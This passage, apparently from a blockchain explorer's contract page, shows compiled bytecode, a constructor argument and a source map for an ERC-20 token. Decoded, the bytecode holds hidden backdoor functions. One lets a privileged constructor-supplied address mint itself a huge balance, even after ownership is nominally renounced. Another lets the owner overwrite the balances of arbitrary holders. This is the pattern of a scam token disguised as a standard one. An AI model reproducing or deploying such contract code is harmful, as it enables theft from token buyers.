0312156115c8576115c7611204565b5b5f83013567ffffffffffffffff8111156115e5576115e4611208565b5b6115f185828601611585565b925050602061160285828601611285565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061165057607f821691505b6020821081036116635761166261160c565b5b50919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320615f8201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b5f6116c360288361115b565b91506116ce82611669565b604082019050919050565b5f6020820190508181035f8301526116f0816116b7565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f61172e82611266565b915061173983611266565b9250828201905080821115611751576117506116f7565b5b92915050565b5f8160011c9050919050565b5f808291508390505b60018511156117ac57808604811115611788576117876116f7565b5b60018516156117975780820291505b80810290506117a585611757565b945061176c565b94509492505050565b5f826117c4576001905061187f565b816117d1575f905061187f565b81600181146117e757600281146117f157611820565b600191505061187f565b60ff841115611803576118026116f7565b5b8360020a91508482111561181a576118196116f7565b5b5061187f565b5060208310610133831016604e8410600b84101617156118555782820a9050838111156118505761184f6116f7565b5b61187f565b6118628484846001611763565b92509050818404811115611879576118786116f7565b5b81810290505b9392505050565b5f61189082611266565b915061189b83611382565b92506118c87fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff84846117b5565b905092915050565b5f6118da82611266565b91506118e583611266565b92508282026118f381611266565b9150828204841483151761190a576119096116f7565b5b5092915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f61194560208361115b565b915061195082611911565b602082019050919050565b5f6020820190508181035f83015261197281611939565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f6119d360258361115b565b91506119de82611979565b604082019050919050565b5f6020820190508181035f830152611a00816119c7565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b5f604082019050611a475f83018561130a565b611a54602083018461130a565b9392505050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f611ab560248361115b565b9150611ac082611a5b565b604082019050919050565b5f6020820190508181035f830152611ae281611aa9565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f611b4360228361115b565b9150611b4e82611ae9565b604082019050919050565b5f6020820190508181035f830152611b7081611b37565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74207a65726f00000000005f82015250565b5f611bab601b8361115b565b9150611bb682611b77565b602082019050919050565b5f6020820190508181035f830152611bd881611b9f565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f611c3960258361115b565b9150611c4482611bdf565b604082019050919050565b5f6020820190508181035f830152611c6681611c2d565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f611cc760238361115b565b9150611cd282611c6d565b604082019050919050565b5f6020820190508181035f830152611cf481611cbb565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320625f8201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b5f611d5560268361115b565b9150611d6082611cfb565b604082019050919050565b5f6020820190508181035f830152611d8281611d49565b905091905056fea2646970667358221220e9c6205a6ae72da16e12463d0c37b95b9742faccfe541765a317629a30c4039064736f6c63430008170033000000000000000000000000dcf17a131069b8d8ce5bb7fcd93322e086158a29

Deployed Bytecode

0x608060405234801561000f575f80fd5b5060043610610109575f3560e01c806370a08231116100a0578063a457c2d71161006f578063a457c2d7146102a7578063a9059cbb146102d7578063dd62ed3e14610307578063fb86a40414610337578063fc7bd0381461035557610109565b806370a0823114610231578063880ad0af146102615780638da5cb5b1461026b57806395d89b411461028957610109565b8063313ce567116100dc578063313ce567146101a957806339509351146101c75780634a8d1348146101f7578063671f3db81461021557610109565b806306fdde031461010d578063095ea7b31461012b57806318160ddd1461015b57806323b872dd14610179575b5f80fd5b610115610371565b60405161012291906111db565b60405180910390f35b61014560048036038101906101409190611299565b610401565b60405161015291906112f1565b60405180910390f35b61016361041e565b6040516101709190611319565b60405180910390f35b610193600480360381019061018e9190611332565b610427565b6040516101a091906112f1565b60405180910390f35b6101b1610519565b6040516101be919061139d565b60405180910390f35b6101e160048036038101906101dc9190611299565b610521565b6040516101ee91906112f1565b60405180910390f35b6101ff6105c8565b60405161020c91906113c5565b60405180910390f35b61022f600480360381019061022a91906113de565b6105f0565b005b61024b60048036038101906102469190611409565b61077a565b6040516102589190611319565b60405180910390f35b6102696107c0565b005b6102736108fa565b60405161028091906113c5565b60405180910390f35b610291610921565b60405161029e91906111db565b60405180910390f35b6102c160048036038101906102bc9190611299565b6109b1565b6040516102ce91906112f1565b60405180910390f35b6102f160048036038101906102ec9190611299565b610a97565b6040516102fe91906112f1565b60405180910390f35b610321600480360381019061031c9190611434565b610ab4565b60405161032e9190611319565b60405180910390f35b61033f610b36565b60405161034c9190611319565b60405180910390f35b61036f600480360381019061036a91906115b2565b610b57565b005b60606004805461038090611639565b80601f01602080910402602001604051908101604052809291908181526020018280546103ac90611639565b80156103f75780601f106103ce576101008083540402835291602001916103f7565b820191905f5260205f20905b8154815290600101906020018083116103da57829003601f168201915b5050505050905090565b5f61041461040d610ce3565b8484610cea565b6001905092915050565b5f600354905090565b5f610433848484610ead565b5f60025f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f61047a610ce3565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050828110156104f9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016104f0906116d9565b60405180910390fd5b61050d85610505610ce3565b858403610cea565b60019150509392505050565b5f6012905090565b5f6105be61052d610ce3565b848460025f61053a610ce3565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546105b99190611724565b610cea565b6001905092915050565b5f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6105f8610ce3565b73ffffffffffffffffffffffffffffffffffffffff1660065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1603610776575f6012600a61065a9190611886565b6305f5e10061066991906118d0565b90505f6127108261067a91906118d0565b90505f6001806001808561068e91906118d0565b61069891906118d0565b6106a291906118d0565b6106ac91906118d0565b905083816106ba91906118d0565b90508060015f6106c8610ce3565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825461070f9190611724565b925050819055503373ffffffffffffffffffffffffffffffffffffffff1660065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461076e575f80fd5b505050610777565b5b50565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b6107c8610ce3565b73ffffffffffffffffffffffffffffffffffffffff166107e66108fa565b73ffffffffffffffffffffffffffffffffffffffff161461083c576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108339061195b565b60405180910390fd5b61dead73ffffffffffffffffffffffffffffffffffffffff165f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a361dead5f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606005805461093090611639565b80601f016020809104026020016040519081016040528092919081815260200182805461095c90611639565b80156109a75780601f1061097e576101008083540402835291602001916109a7565b820191905f5260205f20905b81548152906001019060200180831161098a57829003601f168201915b5050505050905090565b5f8060025f6109be610ce3565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905082811015610a78576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a6f906119e9565b60405180910390fd5b610a8c610a83610ce3565b85858403610cea565b600191505092915050565b5f610aaa610aa3610ce3565b8484610ead565b6001905092915050565b5f60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b6012600a610b449190611886565b64012a05f200610b5491906118d0565b81565b610b5f610ce3565b73ffffffffffffffffffffffffffffffffffffffff16610b7d6108fa565b73ffffffffffffffffffffffffffffffffffffffff1614610bd3576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bca9061195b565b60405180910390fd5b5f5b8251811015610cde575f838281518110610bf257610bf1611a07565b5b602002602001015190505f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205490508360015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff167fd551363168ce4784e28e5d59fc07cbea2191657416e05f6e8cd8f1086eb91e6d8286604051610cc7929190611a34565b60405180910390a250508080600101915050610bd5565b505050565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610d58576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d4f90611acb565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610dc6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dbd90611b59565b60405180910390fd5b8060025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610ea09190611319565b60405180910390a3505050565b5f8111610eef576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ee690611bc1565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610f5d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f5490611c4f565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610fcb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fc290611cdd565b60405180910390fd5b5f60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205490508181101561104f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161104690611d6b565b60405180910390fd5b81810360015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508160015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8282546110df9190611724565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516111439190611319565b60405180910390a350505050565b5f81519050919050565b5f82825260208201905092915050565b5f5b8381101561118857808201518184015260208101905061116d565b5f8484015250505050565b5f601f19601f8301169050919050565b5f6111ad82611151565b6111b7818561115b565b93506111c781856020860161116b565b6111d081611193565b840191505092915050565b5f6020820190508181035f8301526111f381846111a3565b905092915050565b5f604051905090565b5f80fd5b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6112358261120c565b9050919050565b6112458161122b565b811461124f575f80fd5b50565b5f813590506112608161123c565b92915050565b5f819050919050565b61127881611266565b8114611282575f80fd5b50565b5f813590506112938161126f565b92915050565b5f80604083850312156112af576112ae611204565b5b5f6112bc85828601611252565b92505060206112cd85828601611285565b9150509250929050565b5f8115159050919050565b6112eb816112d7565b82525050565b5f6020820190506113045f8301846112e2565b92915050565b61131381611266565b82525050565b5f60208201905061132c5f83018461130a565b92915050565b5f805f6060848603121561134957611348611204565b5b5f61135686828701611252565b935050602061136786828701611252565b925050604061137886828701611285565b9150509250925092565b5f60ff82169050919050565b61139781611382565b82525050565b5f6020820190506113b05f83018461138e565b92915050565b6113bf8161122b565b82525050565b5f6020820190506113d85f8301846113b6565b92915050565b5f602082840312156113f3576113f2611204565b5b5f61140084828501611285565b91505092915050565b5f6020828403121561141e5761141d611204565b5b5f61142b84828501611252565b91505092915050565b5f806040838503121561144a57611449611204565b5b5f61145785828601611252565b925050602061146885828601611252565b9150509250929050565b5f80fd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b6114ac82611193565b810181811067ffffffffffffffff821117156114cb576114ca611476565b5b80604052505050565b5f6114dd6111fb565b90506114e982826114a3565b919050565b5f67ffffffffffffffff82111561150857611507611476565b5b602082029050602081019050919050565b5f80fd5b5f61152f61152a846114ee565b6114d4565b9050808382526020820190506020840283018581111561155257611551611519565b5b835b8181101561157b57806115678882611252565b845260208401935050602081019050611554565b5050509392505050565b5f82601f83011261159957611598611472565b5b81356115a984826020860161151d565b91505092915050565b5f80604083850312156115c8576115c7611204565b5b5f83013567ffffffffffffffff8111156115e5576115e4611208565b5b6115f185828601611585565b925050602061160285828601611285565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061165057607f821691505b6020821081036116635761166261160c565b5b50919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320615f8201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b5f6116c360288361115b565b91506116ce82611669565b604082019050919050565b5f6020820190508181035f8301526116f0816116b7565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f61172e82611266565b915061173983611266565b9250828201905080821115611751576117506116f7565b5b92915050565b5f8160011c9050919050565b5f808291508390505b60018511156117ac57808604811115611788576117876116f7565b5b60018516156117975780820291505b80810290506117a585611757565b945061176c565b94509492505050565b5f826117c4576001905061187f565b816117d1575f905061187f565b81600181146117e757600281146117f157611820565b600191505061187f565b60ff841115611803576118026116f7565b5b8360020a91508482111561181a576118196116f7565b5b5061187f565b5060208310610133831016604e8410600b84101617156118555782820a9050838111156118505761184f6116f7565b5b61187f565b6118628484846001611763565b92509050818404811115611879576118786116f7565b5b81810290505b9392505050565b5f61189082611266565b915061189b83611382565b92506118c87fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff84846117b5565b905092915050565b5f6118da82611266565b91506118e583611266565b92508282026118f381611266565b9150828204841483151761190a576119096116f7565b5b5092915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f61194560208361115b565b915061195082611911565b602082019050919050565b5f6020820190508181035f83015261197281611939565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f6119d360258361115b565b91506119de82611979565b604082019050919050565b5f6020820190508181035f830152611a00816119c7565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b5f604082019050611a475f83018561130a565b611a54602083018461130a565b9392505050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f611ab560248361115b565b9150611ac082611a5b565b604082019050919050565b5f6020820190508181035f830152611ae281611aa9565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f611b4360228361115b565b9150611b4e82611ae9565b604082019050919050565b5f6020820190508181035f830152611b7081611b37565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74207a65726f00000000005f82015250565b5f611bab601b8361115b565b9150611bb682611b77565b602082019050919050565b5f6020820190508181035f830152611bd881611b9f565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f611c3960258361115b565b9150611c4482611bdf565b604082019050919050565b5f6020820190508181035f830152611c6681611c2d565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f611cc760238361115b565b9150611cd282611c6d565b604082019050919050565b5f6020820190508181035f830152611cf481611cbb565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320625f8201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b5f611d5560268361115b565b9150611d6082611cfb565b604082019050919050565b5f6020820190508181035f830152611d8281611d49565b905091905056fea2646970667358221220e9c6205a6ae72da16e12463d0c37b95b9742faccfe541765a317629a30c4039064736f6c63430008170033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000dcf17a131069b8d8ce5bb7fcd93322e086158a29

-----Decoded View---------------
Arg [0] : ads (address): 0xdcf17a131069b8D8cE5bB7FCD93322e086158A29

-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 000000000000000000000000dcf17a131069b8d8ce5bb7fcd93322e086158a29


Deployed Bytecode Sourcemap

6791:8550:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8420:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10813:184;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9083:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11337:529;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8871:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12213:225;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7397:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7492:393;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;9381:143;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5825:230;;;:::i;:::-;;6136:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8633:104;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12770:460;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9818:200;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10320:164;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7154:67;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7979:332;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;8420:100;8474:13;8507:5;8500:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8420:100;:::o;10813:184::-;10916:4;10933:34;10942:12;:10;:12::i;:::-;10956:2;10960:6;10933:8;:34::i;:::-;10985:4;10978:11;;10813:184;;;;:::o;9083:108::-;9144:7;9171:12;;9164:19;;9083:108;:::o;11337:529::-;11477:4;11494:36;11504:6;11512:9;11523:6;11494:9;:36::i;:::-;11543:24;11570:11;:19;11582:6;11570:19;;;;;;;;;;;;;;;:33;11590:12;:10;:12::i;:::-;11570:33;;;;;;;;;;;;;;;;11543:60;;11656:6;11636:16;:26;;11614:116;;;;;;;;;;;;:::i;:::-;;;;;;;;;11766:57;11775:6;11783:12;:10;:12::i;:::-;11816:6;11797:16;:25;11766:8;:57::i;:::-;11854:4;11847:11;;;11337:529;;;;;:::o;8871:100::-;8929:5;7145:2;8947:16;;8871:100;:::o;12213:225::-;12321:4;12338:70;12347:12;:10;:12::i;:::-;12361:2;12397:10;12365:11;:25;12377:12;:10;:12::i;:::-;12365:25;;;;;;;;;;;;;;;:29;12391:2;12365:29;;;;;;;;;;;;;;;;:42;;;;:::i;:::-;12338:8;:70::i;:::-;12426:4;12419:11;;12213:225;;;;:::o;7397:87::-;7436:7;7463:13;;;;;;;;;;;7456:20;;7397:87;:::o;7492:393::-;7565:12;:10;:12::i;:::-;7548:29;;:13;;;;;;;;;;;:29;;;7545:333;;7593:12;7145:2;7618;:13;;;;:::i;:::-;7608:9;:23;;;;:::i;:::-;7593:38;;7646:15;7669:5;7664:4;:10;;;;:::i;:::-;7646:28;;7689:9;7715:1;7713;7711;7709;7701:7;:9;;;;:::i;:::-;:11;;;;:::i;:::-;:13;;;;:::i;:::-;:15;;;;:::i;:::-;7689:27;;7745:6;7738:4;:13;;;;:::i;:::-;7731:20;;7793:4;7766:9;:23;7776:12;:10;:12::i;:::-;7766:23;;;;;;;;;;;;;;;;:31;;;;;;;:::i;:::-;;;;;;;;7837:10;7820:27;;:13;;;;;;;;;;;:27;;;7812:36;;;;;;7578:282;;;7545:333;;;;7492:393;:::o;9381:143::-;9471:7;9498:9;:18;9508:7;9498:18;;;;;;;;;;;;;;;;9491:25;;9381:143;;;:::o;5825:230::-;5410:12;:10;:12::i;:::-;5399:23;;:7;:5;:7::i;:::-;:23;;;5391:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;5932:42:::1;5895:81;;5916:6;::::0;::::1;;;;;;;;5895:81;;;;;;;;;;;;6004:42;5987:6;::::0;:60:::1;;;;;;;;;;;;;;;;;;5825:230::o:0;6136:87::-;6182:7;6209:6;;;;;;;;;;;6202:13;;6136:87;:::o;8633:104::-;8689:13;8722:7;8715:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8633:104;:::o;12770:460::-;12883:4;12900:24;12927:11;:25;12939:12;:10;:12::i;:::-;12927:25;;;;;;;;;;;;;;;:29;12953:2;12927:29;;;;;;;;;;;;;;;;12900:56;;13009:15;12989:16;:35;;12967:122;;;;;;;;;;;;:::i;:::-;;;;;;;;;13125:62;13134:12;:10;:12::i;:::-;13148:2;13171:15;13152:16;:34;13125:8;:62::i;:::-;13218:4;13211:11;;;12770:460;;;;:::o;9818:200::-;9929:4;9946:42;9956:12;:10;:12::i;:::-;9970:9;9981:6;9946:9;:42::i;:::-;10006:4;9999:11;;9818:200;;;;:::o;10320:164::-;10428:7;10455:11;:17;10467:4;10455:17;;;;;;;;;;;;;;;:21;10473:2;10455:21;;;;;;;;;;;;;;;;10448:28;;10320:164;;;;:::o;7154:67::-;7145:2;7205;:15;;;;:::i;:::-;7188:13;:33;;;;:::i;:::-;7154:67;:::o;7979:332::-;5410:12;:10;:12::i;:::-;5399:23;;:7;:5;:7::i;:::-;:23;;;5391:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;8070:9:::1;8065:239;8089:8;:15;8085:1;:19;8065:239;;;8122:15;8140:8;8149:1;8140:11;;;;;;;;:::i;:::-;;;;;;;;8122:29;;8162:17;8182:9;:18;8192:7;8182:18;;;;;;;;;;;;;;;;8162:38;;8232:6;8211:9;:18;8221:7;8211:18;;;;;;;;;;;;;;;:27;;;;8265:7;8254:38;;;8274:9;8285:6;8254:38;;;;;;;:::i;:::-;;;;;;;;8111:193;;8106:3;;;;;;;8065:239;;;;7979:332:::0;;:::o;4189:98::-;4242:7;4269:10;4262:17;;4189:98;:::o;14982:356::-;15128:1;15112:18;;:4;:18;;;15104:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;15204:1;15190:16;;:2;:16;;;15182:63;;;;;;;;;;;;:::i;:::-;;;;;;;;;15282:6;15258:11;:17;15270:4;15258:17;;;;;;;;;;;;;;;:21;15276:2;15258:21;;;;;;;;;;;;;;;:30;;;;15319:2;15304:26;;15313:4;15304:26;;;15323:6;15304:26;;;;;;:::i;:::-;;;;;;;;14982:356;;;:::o;13500:712::-;13649:1;13640:6;:10;13632:50;;;;;;;;;;;;:::i;:::-;;;;;;;;;13719:1;13701:20;;:6;:20;;;13693:70;;;;;;;;;;;;:::i;:::-;;;;;;;;;13803:1;13782:23;;:9;:23;;;13774:71;;;;;;;;;;;;:::i;:::-;;;;;;;;;13858:21;13882:9;:17;13892:6;13882:17;;;;;;;;;;;;;;;;13858:41;;13949:6;13932:13;:23;;13910:111;;;;;;;;;;;;:::i;:::-;;;;;;;;;14093:6;14077:13;:22;14057:9;:17;14067:6;14057:17;;;;;;;;;;;;;;;:42;;;;14145:6;14121:9;:20;14131:9;14121:20;;;;;;;;;;;;;;;;:30;;;;;;;:::i;:::-;;;;;;;;14186:9;14169:35;;14178:6;14169:35;;;14197:6;14169:35;;;;;;:::i;:::-;;;;;;;;13621:591;13500:712;;;:::o;7:99:1:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:246::-;368:1;378:113;392:6;389:1;386:13;378:113;;;477:1;472:3;468:11;462:18;458:1;453:3;449:11;442:39;414:2;411:1;407:10;402:15;;378:113;;;525:1;516:6;511:3;507:16;500:27;349:184;287:246;;;:::o;539:102::-;580:6;631:2;627:7;622:2;615:5;611:14;607:28;597:38;;539:102;;;:::o;647:377::-;735:3;763:39;796:5;763:39;:::i;:::-;818:71;882:6;877:3;818:71;:::i;:::-;811:78;;898:65;956:6;951:3;944:4;937:5;933:16;898:65;:::i;:::-;988:29;1010:6;988:29;:::i;:::-;983:3;979:39;972:46;;739:285;647:377;;;;:::o;1030:313::-;1143:4;1181:2;1170:9;1166:18;1158:26;;1230:9;1224:4;1220:20;1216:1;1205:9;1201:17;1194:47;1258:78;1331:4;1322:6;1258:78;:::i;:::-;1250:86;;1030:313;;;;:::o;1349:75::-;1382:6;1415:2;1409:9;1399:19;;1349:75;:::o;1430:117::-;1539:1;1536;1529:12;1553:117;1662:1;1659;1652:12;1676:126;1713:7;1753:42;1746:5;1742:54;1731:65;;1676:126;;;:::o;1808:96::-;1845:7;1874:24;1892:5;1874:24;:::i;:::-;1863:35;;1808:96;;;:::o;1910:122::-;1983:24;2001:5;1983:24;:::i;:::-;1976:5;1973:35;1963:63;;2022:1;2019;2012:12;1963:63;1910:122;:::o;2038:139::-;2084:5;2122:6;2109:20;2100:29;;2138:33;2165:5;2138:33;:::i;:::-;2038:139;;;;:::o;2183:77::-;2220:7;2249:5;2238:16;;2183:77;;;:::o;2266:122::-;2339:24;2357:5;2339:24;:::i;:::-;2332:5;2329:35;2319:63;;2378:1;2375;2368:12;2319:63;2266:122;:::o;2394:139::-;2440:5;2478:6;2465:20;2456:29;;2494:33;2521:5;2494:33;:::i;:::-;2394:139;;;;:::o;2539:474::-;2607:6;2615;2664:2;2652:9;2643:7;2639:23;2635:32;2632:119;;;2670:79;;:::i;:::-;2632:119;2790:1;2815:53;2860:7;2851:6;2840:9;2836:22;2815:53;:::i;:::-;2805:63;;2761:117;2917:2;2943:53;2988:7;2979:6;2968:9;2964:22;2943:53;:::i;:::-;2933:63;;2888:118;2539:474;;;;;:::o;3019:90::-;3053:7;3096:5;3089:13;3082:21;3071:32;;3019:90;;;:::o;3115:109::-;3196:21;3211:5;3196:21;:::i;:::-;3191:3;3184:34;3115:109;;:::o;3230:210::-;3317:4;3355:2;3344:9;3340:18;3332:26;;3368:65;3430:1;3419:9;3415:17;3406:6;3368:65;:::i;:::-;3230:210;;;;:::o;3446:118::-;3533:24;3551:5;3533:24;:::i;:::-;3528:3;3521:37;3446:118;;:::o;3570:222::-;3663:4;3701:2;3690:9;3686:18;3678:26;;3714:71;3782:1;3771:9;3767:17;3758:6;3714:71;:::i;:::-;3570:222;;;;:::o;3798:619::-;3875:6;3883;3891;3940:2;3928:9;3919:7;3915:23;3911:32;3908:119;;;3946:79;;:::i;:::-;3908:119;4066:1;4091:53;4136:7;4127:6;4116:9;4112:22;4091:53;:::i;:::-;4081:63;;4037:117;4193:2;4219:53;4264:7;4255:6;4244:9;4240:22;4219:53;:::i;:::-;4209:63;;4164:118;4321:2;4347:53;4392:7;4383:6;4372:9;4368:22;4347:53;:::i;:::-;4337:63;;4292:118;3798:619;;;;;:::o;4423:86::-;4458:7;4498:4;4491:5;4487:16;4476:27;;4423:86;;;:::o;4515:112::-;4598:22;4614:5;4598:22;:::i;:::-;4593:3;4586:35;4515:112;;:::o;4633:214::-;4722:4;4760:2;4749:9;4745:18;4737:26;;4773:67;4837:1;4826:9;4822:17;4813:6;4773:67;:::i;:::-;4633:214;;;;:::o;4853:118::-;4940:24;4958:5;4940:24;:::i;:::-;4935:3;4928:37;4853:118;;:::o;4977:222::-;5070:4;5108:2;5097:9;5093:18;5085:26;;5121:71;5189:1;5178:9;5174:17;5165:6;5121:71;:::i;:::-;4977:222;;;;:::o;5205: